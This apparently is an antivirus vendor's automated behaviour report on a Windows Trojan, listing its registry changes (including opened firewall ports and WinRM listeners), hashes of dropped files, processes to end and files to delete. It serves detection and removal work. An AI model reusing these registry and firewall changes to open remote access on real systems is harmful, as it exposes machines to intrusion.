"dvqs"
The process wsmanhttpconfig.exe:3892 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "C6 61 2A AF 82 B1 8F 54 C6 94 96 EB 9B 85 D3 EB"
The process wsmanhttpconfig.exe:3828 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "B4 1E 83 E7 C1 82 B8 77 2D D6 9A 93 4B 0C DB AA"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN\Plugin\Event Forwarding Plugin]
"ConfigXML" = ""
[HKLM\System\CurrentControlSet\Services\HTTP\Parameters\UrlAclInfo]
"http:// :47001/wsman/" = "01 00 04 80 00 00 00 00 00 00 00 00 00 00 00 00"
[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List]
"80:TCP" = "80:TCP:*:Enabled:Windows Remote Management - Compatibility Mode (HTTP-In)"
[HKLM\System\CurrentControlSet\Services\HTTP\Parameters\UrlAclInfo]
"https:// :5986/wsman/" = "01 00 04 80 00 00 00 00 00 00 00 00 00 00 00 00"
[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List]
"5985:TCP" = "5985:TCP:*:Enabled:Windows Remote Management"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN]
"UpdatedConfig" = "D2861E38-B21F-453E-9F77-6D7A55E86098"
[HKLM\System\CurrentControlSet\Services\HTTP\Parameters\UrlAclInfo]
"http:// :5985/wsman/" = "01 00 04 80 00 00 00 00 00 00 00 00 00 00 00 00"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN\Plugin\WMI Provider]
"ConfigXML" = ""
Dropped PE files
MD5 | File path |
---|---|
85d7ab466d0577c49fc9879107ec7ef5 | c:\82ea8d5099742dc8f49f42\compiledcomposition.microsoft.powershell.gpowershell.dll |
2f7fe3a781ba8c0a67c775f20e3e9f70 | c:\82ea8d5099742dc8f49f42\microsoft.backgroundintelligenttransfer.management.dll |
173d3dd1425a8e33fa1d4ed71067a3a2 | c:\82ea8d5099742dc8f49f42\microsoft.backgroundintelligenttransfer.management.interop.dll |
75c183e262bd4400eb0f20349f6ef383 | c:\82ea8d5099742dc8f49f42\microsoft.backgroundintelligenttransfer.management.resources.dll |
08e87e8abf7b41b28663dce817ce0ab6 | c:\82ea8d5099742dc8f49f42\microsoft.powershell.commands.diagnostics.dll |
4e2482e69baaf3a5b13db8101c063ebf | c:\82ea8d5099742dc8f49f42\microsoft.powershell.commands.diagnostics.resources.dll |
f3ac3f844f90380aab2b4c0836c4288f | c:\82ea8d5099742dc8f49f42\microsoft.powershell.commands.management.dll |
b87e087fc013225e2aa1cb60c080647d | c:\82ea8d5099742dc8f49f42\microsoft.powershell.commands.management.resources.dll |
dfeb401cc051e5da721c584ff6a90f88 | c:\82ea8d5099742dc8f49f42\microsoft.powershell.commands.utility.dll |
1ce73fb3f88c716cfc3fd550547d2b35 | c:\82ea8d5099742dc8f49f42\microsoft.powershell.commands.utility.resources.dll |
3991b7fa452a9c9c291c06365a236792 | c:\82ea8d5099742dc8f49f42\microsoft.powershell.consolehost.dll |
36ff641f37918f2cca98e7f407ac4d75 | c:\82ea8d5099742dc8f49f42\microsoft.powershell.consolehost.resources.dll |
208fa9d0ebe2ceb9616042772e96598e | c:\82ea8d5099742dc8f49f42\microsoft.powershell.editor.dll |
37bed865557084dd9988350ab1675e0b | c:\82ea8d5099742dc8f49f42\microsoft.powershell.editor.resources.dll |
d4eefccdc3de6ced901535fa4153c491 | c:\82ea8d5099742dc8f49f42\microsoft.powershell.gpowershell.dll |
71d8f6d5dc35517275bc38ebcc815f9f | c:\Documents and Settings\"%CurrentUserName%"\Application Data\UUPPHBZOfNIWNOEBZBhdR.exe |
9859a26d5e72bbb0685af813b409d99d | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\WindowsXP-KB968930-x86-ENG.exe |
fc9a05096522bb6d7ceda62ea1707420 | c:\WINDOWS\$968930Uinstall_KB968930$\PSCustomSetupUtil.exe |
35efd8cd6549a4339cb2a28c8cfd6598 | c:\WINDOWS\$968930Uinstall_KB968930$\PSSetupNativeUtils.exe |
a39df582ca051afc8811fbd00db12f10 | c:\WINDOWS\$968930Uinstall_KB968930$\spuninst\spuninst.exe |
9a055da2f2819f155c33d47cd67a7c00 | c:\WINDOWS\$968930Uinstall_KB968930$\spuninst\updspapi.dll |
75c183e262bd4400eb0f20349f6ef383 | c:\WINDOWS\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management.resources\1.0.0.0_en_31bf3856ad364e35\Microsoft.BackgroundIntelligentTransfer.Management.resources.dll |
2f7fe3a781ba8c0a67c775f20e3e9f70 | c:\WINDOWS\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management\1.0.0.0__31bf3856ad364e35\Microsoft.BackgroundIntelligentTransfer.Management.dll |
4e2482e69baaf3a5b13db8101c063ebf | c:\WINDOWS\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Diagnostics.resources\1.0.0.0_en_31bf3856ad364e35\Microsoft.PowerShell.Commands.Diagnostics.resources.dll |
08e87e8abf7b41b28663dce817ce0ab6 | c:\WINDOWS\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Diagnostics\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Diagnostics.dll |
b87e087fc013225e2aa1cb60c080647d | c:\WINDOWS\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management.resources\1.0.0.0_en_31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.resources.dll |
f3ac3f844f90380aab2b4c0836c4288f | c:\WINDOWS\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll |
1ce73fb3f88c716cfc3fd550547d2b35 | c:\WINDOWS\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility.resources\1.0.0.0_en_31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.resources.dll |
dfeb401cc051e5da721c584ff6a90f88 | c:\WINDOWS\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll |
36ff641f37918f2cca98e7f407ac4d75 | c:\WINDOWS\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost.resources\1.0.0.0_en_31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.resources.dll |
3991b7fa452a9c9c291c06365a236792 | c:\WINDOWS\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll |
c7a0d1321a67a2afd330c5fbe79befd1 | c:\WINDOWS\assembly\GAC_MSIL\Microsoft.PowerShell.Security.resources\1.0.0.0_en_31bf3856ad364e35\Microsoft.PowerShell.Security.resources.dll |
53a9d748ef09920a0d06da2583c298ad | c:\WINDOWS\assembly\GAC_MSIL\Microsoft.PowerShell.Security\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll |
6372ea7d2aced7185183cf3fcdd3577b | c:\WINDOWS\assembly\GAC_MSIL\Microsoft.WSMan.Management.resources\1.0.0.0_en_31bf3856ad364e35\Microsoft.WSMan.Management.resources.dll |
1a4e900c2fe3cd31d10107670d184fe6 | c:\WINDOWS\assembly\GAC_MSIL\Microsoft.WSMan.Management\1.0.0.0__31bf3856ad364e35\Microsoft.WSMan.Management.dll |
f7da27672d2e4c21a1f996ee31de0dbf | c:\WINDOWS\assembly\GAC_MSIL\Microsoft.WSMan.Runtime\1.0.0.0__31bf3856ad364e35\Microsoft.WSMan.Runtime.dll |
2286b57ecc2d32d24049c51989084268 | c:\WINDOWS\assembly\GAC_MSIL\System.Management.Automation.resources\1.0.0.0_en_31bf3856ad364e35\System.Management.Automation.resources.dll |
4d8ab4fad244f7985d8c59d456e026d7 | c:\WINDOWS\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.dll |
85d7ab466d0577c49fc9879107ec7ef5 | c:\WINDOWS\system32\WindowsPowerShell\v1.0\CompiledComposition.Microsoft.PowerShell.GPowerShell.dll |
173d3dd1425a8e33fa1d4ed71067a3a2 | c:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\BitsTransfer\microsoft.backgroundintelligenttransfer.management.interop.dll |
df4217ddb34a0b73dc7aac7829371c0c | c:\WINDOWS\system32\WindowsPowerShell\v1.0\powershell.exe |
fe7bc06af17d7cd8fb8e6d72d72453b8 | c:\WINDOWS\system32\WindowsPowerShell\v1.0\powershell.exe.mui |
36b6f71b6d7d280302b348145db05a9f | c:\WINDOWS\system32\WindowsPowerShell\v1.0\powershell_ise.exe |
cb3a534127f37d0fa1f556dbb76575d3 | c:\WINDOWS\system32\WindowsPowerShell\v1.0\powershell_ise.resources.dll |
95b7f12a557dedac5e4a1e9afa5e73ab | c:\WINDOWS\system32\WindowsPowerShell\v1.0\pspluginwkr.dll |
a94243b797377ba03b63fc716c13bcf5 | c:\WINDOWS\system32\WindowsPowerShell\v1.0\pwrshmsg.dll |
7943a80f1a6fd37969aacd411b511f91 | c:\WINDOWS\system32\WindowsPowerShell\v1.0\pwrshsip.dll |
2c9c9ae86eb2b4e78c8e09deb7509a63 | c:\WINDOWS\system32\WsmAuto.dll |
67146d3606be1111a39f0fd61f47e9b6 | c:\WINDOWS\system32\WsmRes.dll |
18f347402da544a780949b8fdf83351b | c:\WINDOWS\system32\WsmSvc.dll |
296e6992278fea7140d88b603e6c2a8a | c:\WINDOWS\system32\WsmWmiPl.dll |
8c386819bf5b39d7a4b274d0b55f87a5 | c:\WINDOWS\system32\pwrshplugin.dll |
84e025b1259c66315f4d45a6caecacc9 | c:\WINDOWS\system32\wevtfwd.dll |
cd17705af8e53a82facb545a213ab09c | c:\WINDOWS\system32\winrmprov.dll |
afdf7654880ce23005014895b129d948 | c:\WINDOWS\system32\winrs.exe |
3e9b11880ae4a8ff399ce0573c82655b | c:\WINDOWS\system32\winrscmd.dll |
62021e3e6ba13d72cf5cc1047cfac991 | c:\WINDOWS\system32\winrshost.exe |
b84092e52861a026fc83bcede4a7abfa | c:\WINDOWS\system32\winrsmgr.dll |
35bc7c49676e5ab617ef94dc9854a6f1 | c:\WINDOWS\system32\winrssrv.dll |
972916faac89c4aa978952b30f478e81 | c:\WINDOWS\system32\wsmanhttpconfig.exe |
23ce21efc2ae95700f2b1f9582fe3867 | c:\WINDOWS\system32\wsmplpxy.dll |
faa2fcc6853e5123e05dccc5919657e2 | c:\WINDOWS\system32\wsmprovhost.exe |
HOSTS file anomalies
No changes have been detected.
Rootkit activity
No anomalies have been detected.
Propagation
Removals
Remove it with Ad-Aware
- Click (here) to download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Terminate malicious process(es) (How to End a Process With the Task Manager):
%original file name%.exe:312
PSSetupNativeUtils.exe:3556
mofcomp.exe:3924
wscript.exe:1992
WindowsXP-KB968930-x86-ENG.exe:2764
ngen.exe:2472
ngen.exe:2904
ngen.exe:2456
ngen.exe:2564
ngen.exe:3000
ngen.exe:2960
ngen.exe:1816
ngen.exe:2520
ngen.exe:2484
ngen.exe:2980
ngen.exe:2348
ngen.exe:3020
ngen.exe:2500
ngen.exe:2444
ngen.exe:2580
ngen.exe:224
ngen.exe:784
ngen.exe:2992
ngen.exe:2492
ngen.exe:2412
ngen.exe:2372
ngen.exe:2532
ngen.exe:2512
update.exe:2828
mscorsvw.exe:2656
mscorsvw.exe:1088
mscorsvw.exe:3536
mscorsvw.exe:3068
mscorsvw.exe:2320
mscorsvw.exe:524
mscorsvw.exe:2152
mscorsvw.exe:420
mscorsvw.exe:2408
mscorsvw.exe:2360
mscorsvw.exe:2580
mscorsvw.exe:3072
mscorsvw.exe:3724
mscorsvw.exe:3644
mscorsvw.exe:3720
mscorsvw.exe:2516
mscorsvw.exe:3204
mscorsvw.exe:3784
mscorsvw.exe:3396
mscorsvw.exe:3224
mscorsvw.exe:3036
mscorsvw.exe:2896
mscorsvw.exe:1768
mscorsvw.exe:2008
PSCustomSetupUtil.exe:452
PSCustomSetupUtil.exe:1096
PSCustomSetupUtil.exe:2824
PSCustomSetupUtil.exe:4024
PSCustomSetupUtil.exe:252
PSCustomSetupUtil.exe:2800
PSCustomSetupUtil.exe:796
PSCustomSetupUtil.exe:4064
PSCustomSetupUtil.exe:320
PSCustomSetupUtil.exe:2648
PSCustomSetupUtil.exe:4092
PSCustomSetupUtil.exe:584
PSCustomSetupUtil.exe:2708
PSCustomSetupUtil.exe:2624
PSCustomSetupUtil.exe:2568
PSCustomSetupUtil.exe:2608
PSCustomSetupUtil.exe:2696
PSCustomSetupUtil.exe:1880
PSCustomSetupUtil.exe:1992
PSCustomSetupUtil.exe:1540
PSCustomSetupUtil.exe:1288
PSCustomSetupUtil.exe:2756
PSCustomSetupUtil.exe:3964
PSCustomSetupUtil.exe:3988
PSCustomSetupUtil.exe:648
PSCustomSetupUtil.exe:2008
UUPPHBZOfNIWNOEBZBhdR.exe:1076
regsvr32.exe:2380
regsvr32.exe:1752
wsmanhttpconfig.exe:3892
wsmanhttpconfig.exe:3828 - Delete the original Trojan file.
- Delete or disinfect the following files created/modified by the Trojan:
%Documents and Settings%\%current user%\Local Settings\Temp\IXP000.TMP\TcEMbLQgCOBP (4077 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\IXP000.TMP\UUPPHBZOfNIWNOEBZBh (803 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\IXP000.TMP\UUPPHBZOfNIWNOEBZBhdR.exe (13304 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk (2 bytes)
%System%\wbem\Logs\mofcomp.log (1814 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\tmpCF.tmp (1 bytes)
C:\82ea8d5099742dc8f49f42\wsmres.dll (6164 bytes)
C:\82ea8d5099742dc8f49f42\about_switch.help.txt (489 bytes)
C:\82ea8d5099742dc8f49f42\about_foreach.help.txt (10 bytes)
C:\82ea8d5099742dc8f49f42\about_functions.help.txt (586 bytes)
C:\82ea8d5099742dc8f49f42\about_do.help.txt (2 bytes)
C:\82ea8d5099742dc8f49f42\microsoft.powershell.commands.diagnostics.dll-help.xml (2301 bytes)
C:\82ea8d5099742dc8f49f42\eventforwarding.adm (2 bytes)
C:\82ea8d5099742dc8f49f42\about_pssessions.help.txt (9 bytes)
C:\82ea8d5099742dc8f49f42\about_wildcards.help.txt (3 bytes)
C:\82ea8d5099742dc8f49f42\microsoft.powershell.security.resources.dll (9 bytes)
C:\82ea8d5099742dc8f49f42\wsmpty.xsl (1 bytes)
C:\82ea8d5099742dc8f49f42\about_remote.help.txt (7 bytes)
C:\82ea8d5099742dc8f49f42\about_debuggers.help.txt (21 bytes)
C:\82ea8d5099742dc8f49f42\microsoft.powershell.security.dll (1145 bytes)
C:\82ea8d5099742dc8f49f42\about_command_syntax.help.txt (5 bytes)
C:\82ea8d5099742dc8f49f42\microsoft.powershell.graphicalhost.resources.dll (16 bytes)
C:\82ea8d5099742dc8f49f42\about_requires.help.txt (2 bytes)
C:\82ea8d5099742dc8f49f42\pspluginwkr.dll (1756 bytes)
C:\82ea8d5099742dc8f49f42\certificate.format.ps1xml (155 bytes)
C:\82ea8d5099742dc8f49f42\diagnostics.format.ps1xml (590 bytes)
C:\82ea8d5099742dc8f49f42\about_break.help.txt (792 bytes)
C:\82ea8d5099742dc8f49f42\wsmauto.dll (1842 bytes)
C:\82ea8d5099742dc8f49f42\powershell_ise.exe (2526 bytes)
C:\82ea8d5099742dc8f49f42\about_quoting_rules.help.txt (659 bytes)
C:\82ea8d5099742dc8f49f42\winrscmd.dll (2907 bytes)
C:\82ea8d5099742dc8f49f42\microsoft.powershell.gpowershell.resources.dll (408 bytes)
C:\82ea8d5099742dc8f49f42\powershell_ise.resources.dll (4 bytes)
C:\82ea8d5099742dc8f49f42\update\kb968930xp.cat (512 bytes)
C:\82ea8d5099742dc8f49f42\getevent.types.ps1xml (15 bytes)
C:\82ea8d5099742dc8f49f42\winrmprov.mof (789 bytes)
C:\82ea8d5099742dc8f49f42\wsmwmipl.dll (2816 bytes)
C:\82ea8d5099742dc8f49f42\update\update.exe (10748 bytes)
C:\82ea8d5099742dc8f49f42\default.help.txt (2 bytes)
C:\82ea8d5099742dc8f49f42\wevtfwd.dll (3351 bytes)
C:\82ea8d5099742dc8f49f42\about_if.help.txt (3 bytes)
C:\82ea8d5099742dc8f49f42\about_assignment_operators.help.txt (379 bytes)
C:\82ea8d5099742dc8f49f42\about_variables.help.txt (6 bytes)
C:\82ea8d5099742dc8f49f42\winrm.vbs (2727 bytes)
C:\82ea8d5099742dc8f49f42\wtrinstaller.ico (4803 bytes)
C:\82ea8d5099742dc8f49f42\about_history.help.txt (3 bytes)
C:\82ea8d5099742dc8f49f42\pscustomsetuputil.exe (316 bytes)
C:\82ea8d5099742dc8f49f42\microsoft.powershell.consolehost.resources.dll (778 bytes)
C:\82ea8d5099742dc8f49f42\about_type_operators.help.txt (5 bytes)
C:\82ea8d5099742dc8f49f42\about_join.help.txt (2 bytes)
C:\82ea8d5099742dc8f49f42\powershell.exe (7339 bytes)
C:\82ea8d5099742dc8f49f42\about_pipelines.help.txt (411 bytes)
C:\82ea8d5099742dc8f49f42\about_arrays.help.txt (8 bytes)
C:\82ea8d5099742dc8f49f42\about_line_editing.help.txt (1 bytes)
C:\82ea8d5099742dc8f49f42\about_functions_advanced.help.txt (3 bytes)
C:\82ea8d5099742dc8f49f42\microsoft.backgroundintelligenttransfer.management.resources.dll (7 bytes)
C:\82ea8d5099742dc8f49f42\about_commonparameters.help.txt (12 bytes)
C:\82ea8d5099742dc8f49f42\about_data_sections.help.txt (5 bytes)
C:\82ea8d5099742dc8f49f42\about_path_syntax.help.txt (5 bytes)
C:\82ea8d5099742dc8f49f42\microsoft.wsman.management.dll-help.xml (8740 bytes)
C:\82ea8d5099742dc8f49f42\compiledcomposition.microsoft.powershell.gpowershell.dll (1737 bytes)
C:\82ea8d5099742dc8f49f42\update\update.inf (2457 bytes)
C:\82ea8d5099742dc8f49f42\about_continue.help.txt (1 bytes)
C:\82ea8d5099742dc8f49f42\pwrshplugin.dll (802 bytes)
C:\82ea8d5099742dc8f49f42\importallmodules.psd1 (438 bytes)
C:\82ea8d5099742dc8f49f42\winrm.cmd (35 bytes)
C:\82ea8d5099742dc8f49f42\spmsg.dll (495 bytes)
C:\82ea8d5099742dc8f49f42\update\update.ver (14 bytes)
C:\82ea8d5099742dc8f49f42\microsoft.powershell.commands.management.dll (3386 bytes)
C:\82ea8d5099742dc8f49f42\microsoft.powershell.consolehost.dll-help.xml (900 bytes)
C:\82ea8d5099742dc8f49f42\about_pssession_details.help.txt (9 bytes)
C:\82ea8d5099742dc8f49f42\types.ps1xml (2510 bytes)
C:\82ea8d5099742dc8f49f42\winrs.exe (1154 bytes)
C:\82ea8d5099742dc8f49f42\about_command_precedence.help.txt (8 bytes)
C:\82ea8d5099742dc8f49f42\winrssrv.dll (12 bytes)
C:\82ea8d5099742dc8f49f42\about_parsing.help.txt (2 bytes)
C:\82ea8d5099742dc8f49f42\help.format.ps1xml (3947 bytes)
C:\82ea8d5099742dc8f49f42\about_core_commands.help.txt (221 bytes)
C:\82ea8d5099742dc8f49f42\about_properties.help.txt (7 bytes)
C:\82ea8d5099742dc8f49f42\about_remote_troubleshooting.help.txt (146 bytes)
C:\82ea8d5099742dc8f49f42\about_signing.help.txt (12 bytes)
C:\82ea8d5099742dc8f49f42\about_regular_expressions.help.txt (5 bytes)
C:\82ea8d5099742dc8f49f42\about_profiles.help.txt (457 bytes)
C:\82ea8d5099742dc8f49f42\bitstransfer.psd1 (950 bytes)
C:\82ea8d5099742dc8f49f42\about_providers.help.txt (59 bytes)
C:\82ea8d5099742dc8f49f42\pwrshmsg.dll (4 bytes)
C:\82ea8d5099742dc8f49f42\about_remote_output.help.txt (887 bytes)
C:\82ea8d5099742dc8f49f42\about_hash_tables.help.txt (6 bytes)
C:\82ea8d5099742dc8f49f42\about_reserved_words.help.txt (1 bytes)
C:\82ea8d5099742dc8f49f42\bitstransfer.format.ps1xml (16 bytes)
C:\82ea8d5099742dc8f49f42\about_scopes.help.txt (76 bytes)
C:\82ea8d5099742dc8f49f42\about_trap.help.txt (10 bytes)
C:\82ea8d5099742dc8f49f42\about_environment_variables.help.txt (417 bytes)
C:\82ea8d5099742dc8f49f42\about_objects.help.txt (2 bytes)
C:\82ea8d5099742dc8f49f42\system.management.automation.dll (38414 bytes)
C:\82ea8d5099742dc8f49f42\about_ws-management_cmdlets.help.txt (405 bytes)
C:\82ea8d5099742dc8f49f42\microsoft.powershell.graphicalhost.dll (4408 bytes)
C:\82ea8d5099742dc8f49f42\$shtdwn$.req (788 bytes)
C:\82ea8d5099742dc8f49f42\about_windows_powershell_2.0.help.txt (453 bytes)
C:\82ea8d5099742dc8f49f42\microsoft.powershell.commands.management.dll-help.xml (28236 bytes)
C:\82ea8d5099742dc8f49f42\about_wmi_cmdlets.help.txt (8 bytes)
C:\82ea8d5099742dc8f49f42\microsoft.powershell.editor.resources.dll (562 bytes)
C:\82ea8d5099742dc8f49f42\about_prompts.help.txt (7 bytes)
C:\82ea8d5099742dc8f49f42\about_throw.help.txt (5 bytes)
C:\82ea8d5099742dc8f49f42\filesystem.format.ps1xml (133 bytes)
C:\82ea8d5099742dc8f49f42\about_comment_based_help.help.txt (595 bytes)
C:\82ea8d5099742dc8f49f42\system.management.automation.resources.dll (3153 bytes)
C:\82ea8d5099742dc8f49f42\about_parameters.help.txt (9 bytes)
C:\82ea8d5099742dc8f49f42\about_eventlogs.help.txt (5 bytes)
C:\82ea8d5099742dc8f49f42\spuninst.exe (3787 bytes)
C:\82ea8d5099742dc8f49f42\about_scripts.help.txt (12 bytes)
C:\82ea8d5099742dc8f49f42\microsoft.wsman.management.resources.dll (13 bytes)
C:\82ea8d5099742dc8f49f42\about_try_catch_finally.help.txt (7 bytes)
C:\82ea8d5099742dc8f49f42\about_modules.help.txt (13 bytes)
C:\82ea8d5099742dc8f49f42\microsoft.backgroundintelligenttransfer.management.dll-help.xml (2472 bytes)
C:\82ea8d5099742dc8f49f42\registry.format.ps1xml (20 bytes)
C:\82ea8d5099742dc8f49f42\windowsremoteshell.adm (12 bytes)
C:\82ea8d5099742dc8f49f42\about_ref.help.txt (1 bytes)
C:\82ea8d5099742dc8f49f42\system.management.automation.dll-help.xml (16567 bytes)
C:\82ea8d5099742dc8f49f42\winrm.ini (1956 bytes)
C:\82ea8d5099742dc8f49f42\about_functions_advanced_methods.help.txt (9 bytes)
C:\82ea8d5099742dc8f49f42\about_for.help.txt (146 bytes)
C:\82ea8d5099742dc8f49f42\powershellcore.format.ps1xml (1492 bytes)
C:\82ea8d5099742dc8f49f42\about_split.help.txt (10 bytes)
C:\82ea8d5099742dc8f49f42\winrmprov.dll (591 bytes)
C:\82ea8d5099742dc8f49f42\winrshost.exe (22 bytes)
C:\82ea8d5099742dc8f49f42\microsoft.powershell.editor.dll (14450 bytes)
C:\82ea8d5099742dc8f49f42\about_methods.help.txt (6 bytes)
C:\82ea8d5099742dc8f49f42\about_bits_cmdlets.help.txt (7 bytes)
C:\82ea8d5099742dc8f49f42\wsmtxt.xsl (2 bytes)
C:\82ea8d5099742dc8f49f42\wsmauto.mof (4 bytes)
C:\82ea8d5099742dc8f49f42\about_operators.help.txt (770 bytes)
C:\82ea8d5099742dc8f49f42\update\updspapi.dll (5940 bytes)
C:\82ea8d5099742dc8f49f42\microsoft.backgroundintelligenttransfer.management.interop.dll (1532 bytes)
C:\82ea8d5099742dc8f49f42\microsoft.powershell.commands.utility.dll-help.xml (20810 bytes)
C:\82ea8d5099742dc8f49f42\about_script_blocks.help.txt (3 bytes)
C:\82ea8d5099742dc8f49f42\wsman.format.ps1xml (837 bytes)
C:\82ea8d5099742dc8f49f42\about_format.ps1xml.help.txt (17 bytes)
C:\82ea8d5099742dc8f49f42\about_job_details.help.txt (824 bytes)
C:\82ea8d5099742dc8f49f42\spupdsvc.exe (287 bytes)
C:\82ea8d5099742dc8f49f42\winrsmgr.dll (2 bytes)
C:\82ea8d5099742dc8f49f42\windowsremotemanagement.adm (574 bytes)
C:\82ea8d5099742dc8f49f42\about_logical_operators.help.txt (2 bytes)
C:\82ea8d5099742dc8f49f42\about_types.ps1xml.help.txt (481 bytes)
C:\82ea8d5099742dc8f49f42\about_special_characters.help.txt (3 bytes)
C:\82ea8d5099742dc8f49f42\about_preference_variables.help.txt (37 bytes)
C:\82ea8d5099742dc8f49f42\about_arithmetic_operators.help.txt (168 bytes)
C:\82ea8d5099742dc8f49f42\about_while.help.txt (2 bytes)
C:\82ea8d5099742dc8f49f42\about_redirection.help.txt (2 bytes)
C:\82ea8d5099742dc8f49f42\about_functions_advanced_parameters.help.txt (962 bytes)
C:\82ea8d5099742dc8f49f42\update\eula.txt (586 bytes)
C:\82ea8d5099742dc8f49f42\wsmsvc.dll (15909 bytes)
C:\82ea8d5099742dc8f49f42\about_locations.help.txt (794 bytes)
C:\82ea8d5099742dc8f49f42\pssetupnativeutils.exe (9 bytes)
C:\82ea8d5099742dc8f49f42\about_script_internationalization.help.txt (9 bytes)
C:\82ea8d5099742dc8f49f42\about_jobs.help.txt (12 bytes)
C:\82ea8d5099742dc8f49f42\about_windows_powershell_ise.help.txt (6 bytes)
C:\82ea8d5099742dc8f49f42\about_return.help.txt (3 bytes)
C:\82ea8d5099742dc8f49f42\microsoft.powershell.gpowershell.dll (9738 bytes)
C:\82ea8d5099742dc8f49f42\microsoft.powershell.commands.utility.resources.dll (508 bytes)
C:\82ea8d5099742dc8f49f42\microsoft.powershell.commands.management.resources.dll (508 bytes)
C:\82ea8d5099742dc8f49f42\powershell.exe.mui (10 bytes)
C:\82ea8d5099742dc8f49f42\microsoft.powershell.security.dll-help.xml (1797 bytes)
C:\82ea8d5099742dc8f49f42\wsmprovhost.exe (657 bytes)
C:\82ea8d5099742dc8f49f42\profile.ps1 (772 bytes)
C:\82ea8d5099742dc8f49f42\dotnettypes.format.ps1xml (266 bytes)
C:\82ea8d5099742dc8f49f42\microsoft.wsman.runtime.dll (33 bytes)
C:\82ea8d5099742dc8f49f42\about_language_keywords.help.txt (11 bytes)
C:\82ea8d5099742dc8f49f42\windowspowershellhelp.chm (26041 bytes)
C:\82ea8d5099742dc8f49f42\about_comparison_operators.help.txt (11 bytes)
C:\82ea8d5099742dc8f49f42\about_transactions.help.txt (1011 bytes)
C:\82ea8d5099742dc8f49f42\about_pssnapins.help.txt (6 bytes)
C:\82ea8d5099742dc8f49f42\about_remote_jobs.help.txt (13 bytes)
C:\82ea8d5099742dc8f49f42\powershelltrace.format.ps1xml (344 bytes)
C:\82ea8d5099742dc8f49f42\about_execution_policies.help.txt (13 bytes)
C:\82ea8d5099742dc8f49f42\wsmplpxy.dll (603 bytes)
C:\82ea8d5099742dc8f49f42\about_automatic_variables.help.txt (14 bytes)
C:\82ea8d5099742dc8f49f42\wsmanhttpconfig.exe (3009 bytes)
C:\82ea8d5099742dc8f49f42\about_functions_cmdletbindingattribute.help.txt (3 bytes)
C:\82ea8d5099742dc8f49f42\pwrshsip.dll (24 bytes)
C:\82ea8d5099742dc8f49f42\microsoft.powershell.commands.diagnostics.resources.dll (470 bytes)
C:\82ea8d5099742dc8f49f42\about_remote_requirements.help.txt (6 bytes)
C:\82ea8d5099742dc8f49f42\about_aliases.help.txt (6 bytes)
C:\82ea8d5099742dc8f49f42\about_escape_characters.help.txt (2 bytes)
C:\82ea8d5099742dc8f49f42\about_remote_faq.help.txt (775 bytes)
C:\82ea8d5099742dc8f49f42\about_session_configurations.help.txt (276 bytes)
C:\82ea8d5099742dc8f49f42\update\spcustom.dll (23 bytes)
%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (1088 bytes)
%System%\SETBF.tmp (42 bytes)
%WinDir%\ocmsn.log (7791 bytes)
%System%\WindowsPowerShell\v1.0\SET86.tmp (4 bytes)
%System%\WindowsPowerShell\v1.0\SETB7.tmp (16 bytes)
%System%\SET12.tmp (1281 bytes)
%System%\WindowsPowerShell\v1.0\SET3E.tmp (1281 bytes)
%System%\GroupPolicy\Adm\SET35.tmp (12 bytes)
%System%\SETC.tmp (2105 bytes)
%System%\WindowsPowerShell\v1.0\SET58.tmp (36 bytes)
%System%\WindowsPowerShell\v1.0\SET51.tmp (14022 bytes)
%System%\WindowsPowerShell\v1.0\SET84.tmp (11 bytes)
%System%\WindowsPowerShell\v1.0\SET46.tmp (601 bytes)
%System%\WindowsPowerShell\v1.0\SET41.tmp (601 bytes)
%System%\WindowsPowerShell\v1.0\Modules\BitsTransfer\SETC0.tmp (950 bytes)
%System%\WindowsPowerShell\v1.0\SET8C.tmp (9 bytes)
%System%\WindowsPowerShell\v1.0\SETCC.tmp (601 bytes)
%System%\WindowsPowerShell\v1.0\SETC9.tmp (1425 bytes)
%System%\WindowsPowerShell\v1.0\SET99.tmp (2 bytes)
%System%\WindowsPowerShell\v1.0\SETA0.tmp (6 bytes)
%System%\WindowsPowerShell\v1.0\SET48.tmp (4 bytes)
%System%\SET2D.tmp (12 bytes)
%System%\WindowsPowerShell\v1.0\SET74.tmp (5 bytes)
%System%\WindowsPowerShell\v1.0\SETA5.tmp (17 bytes)
